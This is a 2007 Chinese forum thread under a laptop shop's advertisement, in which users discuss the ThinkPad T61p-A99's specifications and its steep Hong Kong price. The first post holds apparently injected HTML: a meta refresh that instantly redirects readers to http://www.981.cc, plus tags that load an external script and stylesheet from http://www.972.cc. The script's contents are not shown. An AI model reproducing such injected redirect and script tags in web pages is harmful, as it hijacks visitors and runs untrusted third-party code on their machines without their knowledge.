开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

新货T61p-A99

刚刚在XX论坛看到T61p-A99,配置方面除了CPU换成T7800以外,其余和T61p-A24基本相同。不知道老大有没有近这款新货哟?好期待...::68::<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

说实话~这是一个极为震撼人的消息!!!!!!

快来吧!!!我要出手拉!!!!

最好别超过我的心里价位~
楼主的信息很灵通啊。
T61P A99 港行 T7800 2.60G 1G 160G nVIDIA  FX570M (128M) 14.1SXGA 1400x1050 ROMBO 2.26kg 9芯 锂电 ¥21000 Vista H B

靠!!!
这个价位我绝对不考虑!!!
我的a24p啊!!!
好怀念啊!!!!
买俩T61了
太贵!没米哦,呵呵……
晕 还是A17吧
a24p啊!!!!严重后悔啊~
呵呵,有这么好的东西了
这就是该出手时没出手,再继续等吧

靠!!!不就cpu多0.3吗??其他都一样!
至于卖那么贵吗?!!!我就.......靠~
很强大
呵呵。好高啊。配置和价钱一样高。
这价位    我是买不起的
最强配置T61p接受预定

ThinkPad T61p BF5(新)
T7700(2.4GHz)/2048MB RAM/160GB 5400rpm HD/15.4.1in 1900x1200/256MB nVIDIA FX570M/DVDRW/
802.11abg wireless/蓝牙/Modem/1Gb Ethernet/UltraNav/
Secure chip/指纹识别/1G讯盘/9芯电池/三年全球联保/
[预订]............................................人民币 原箱整机超值价:17650元  全套赠品套餐价:17800元

Thinkpad中目前最高的cpu,最高的内存,最高的硬盘,最高的显卡,最大的屏幕,等等。。。。。综合起来就是现在这款机器了,价格个人觉得不是很贵。
想要的朋友可以和我们预订以下,大概2-3天就能到北京了

和这个比比 ......
和普通14的怎么比???便携性更强~
显卡还少一半呢!

有钱人呢
屏幕巨大的机型,本人不考虑。
原帖由 davidyxy 于 2007-11-17 19:39 发表
T61P A99 港行 T7800 2.60G 1G 160G nVIDIA  FX570M (128M) 14.1SXGA 1400x1050 ROMBO 2.26kg 9芯 锂电 ¥21000 Vista H B

靠!!!
这个价位我绝对不考虑!!!
我的a24p啊!!! ...

我看的价格可不是这样的哟,16000左右吧,不过还是贵,要是显卡上一个档次就好了
jjyy 太有钱了

计划抢劫ing-----
价格比较高~~~~~~~~~~~~
水货和行货一样的,为什么不买水货?
5400没什么好的
原帖由 jetyuk 于 2007-11-17 21:58 发表
570M 不配256M 128BIT的显存等于没意义,阉割的东西,极其不喜欢。

真的假的啊?那就只有T61p-AK1的显卡才行了?